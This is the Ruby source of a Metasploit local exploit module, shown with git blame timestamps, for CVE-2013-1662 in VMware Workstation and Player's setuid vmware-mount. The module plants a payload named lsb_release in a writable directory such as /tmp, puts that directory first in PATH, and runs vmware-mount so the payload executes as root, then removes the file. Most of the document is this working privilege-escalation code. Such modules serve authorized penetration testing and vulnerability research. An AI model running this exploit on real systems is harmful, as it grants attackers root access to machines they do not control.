metasploit-framework/modules/exploits/linux/local/vmware_mount.rb

90 lines
2.8 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
2016-03-08 13:02:44 +00:00
class MetasploitModule < Msf::Exploit::Local
2013-09-05 18:41:25 +00:00
include Msf::Exploit::EXE
include Msf::Post::File
2013-08-30 21:28:54 +00:00
def initialize(info={})
super( update_info( info, {
'Name' => 'VMWare Setuid vmware-mount Unsafe popen(3)',
'Description' => %q{
VMWare Workstation (up to and including 9.0.2 build-1031769)
and Player have a setuid executable called vmware-mount that
invokes lsb_release in the PATH with popen(3). Since PATH is
user-controlled, and the default system shell on
Debian-derived distributions does not drop privs, we can put
an arbitrary payload in an executable called lsb_release and
have vmware-mount happily execute it as root for us.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Tavis Ormandy', # Vulnerability discovery and PoC
'egypt' # Metasploit module
],
'Platform' => [ 'linux' ],
'Arch' => ARCH_X86,
'Targets' =>
[
[ 'Automatic', { } ],
],
'DefaultOptions' => {
"PrependSetresuid" => true,
"PrependSetresgid" => true,
2013-09-05 18:24:09 +00:00
"PrependFork" => true,
2013-08-30 21:28:54 +00:00
},
'Privileged' => true,
'DefaultTarget' => 0,
'References' => [
[ 'CVE', '2013-1662' ],
[ 'OSVDB', '96588' ],
2013-08-30 21:28:54 +00:00
[ 'BID', '61966'],
[ 'URL', 'http://blog.cmpxchg8b.com/2013/08/security-debianisms.html' ],
[ 'URL', 'http://www.vmware.com/support/support-resources/advisories/VMSA-2013-0010.html' ],
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/09/05/cve-2013-1662-vmware-mount-exploit' ]
2013-08-30 21:28:54 +00:00
],
'DisclosureDate' => "Aug 22 2013"
}
))
register_options([
2014-11-27 21:38:50 +00:00
OptString.new("WRITABLEDIR", [ true, "A directory where you can write files.", "/tmp" ]),
], self.class)
2013-08-30 21:28:54 +00:00
end
2013-08-30 21:28:54 +00:00
def check
if setuid?("/usr/bin/vmware-mount")
2014-01-24 18:08:23 +00:00
CheckCode::Appears
2013-08-30 21:28:54 +00:00
else
CheckCode::Safe
end
end
2013-08-30 21:28:54 +00:00
def exploit
2014-11-26 06:53:30 +00:00
unless check == CheckCode::Appears
2013-08-30 21:28:54 +00:00
fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid")
end
2014-11-27 21:38:50 +00:00
lsb_path = File.join(datastore['WRITABLEDIR'], 'lsb_release')
write_file(lsb_path, generate_payload_exe)
cmd_exec("chmod +x #{lsb_path}")
cmd_exec("PATH=#{datastore['WRITABLEDIR']}:$PATH /usr/bin/vmware-mount")
2013-08-30 21:28:54 +00:00
# Delete it here instead of using FileDropper because the original
# session can clean it up
2014-11-27 21:38:50 +00:00
cmd_exec("rm -f #{lsb_path}")
2013-08-30 21:28:54 +00:00
end
2013-08-30 21:28:54 +00:00
def setuid?(remote_file)
2014-03-04 17:30:42 +00:00
!!(cmd_exec("test -u #{remote_file.strip} && echo true").index "true")
2013-08-30 21:28:54 +00:00
end
end